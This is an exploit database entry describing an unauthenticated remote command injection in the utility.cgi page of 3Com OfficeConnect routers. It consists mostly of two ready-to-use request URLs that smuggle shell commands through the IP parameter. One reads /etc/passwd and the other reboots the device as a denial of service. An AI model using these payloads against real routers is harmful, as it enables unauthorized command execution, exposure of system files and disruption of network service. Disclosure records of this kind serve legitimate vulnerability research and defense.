3Com OfficeConnect code execution

2009-10-19T00:00:00
ID 1337DAY-ID-9567
Type zdt
Reporter Andrea Fabizi
Modified 2009-10-19T00:00:00

Description

Exploit for unknown platform in category remote exploits

                                        
                                            =================================
3Com OfficeConnect code execution 
=================================


# Title: 3Com OfficeConnect code execution
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Andrea Fabizi
# Published: 2009-10-19
# Verified: yes


view source
print?
####### Remote command execution  #######
 
http://1.2.3.4/utility.cgi?testType=1&IP=aaa || cat /etc/passwd
 
To see the command output you need to log into the router, however the
command is executed even the user is not logged in, so if you don't
have access to the device a DOS is also possible:
 
http://1.2.3.4/utility.cgi?testType=1&IP=aaa || reboot




#  0day.today [2016-04-20]  #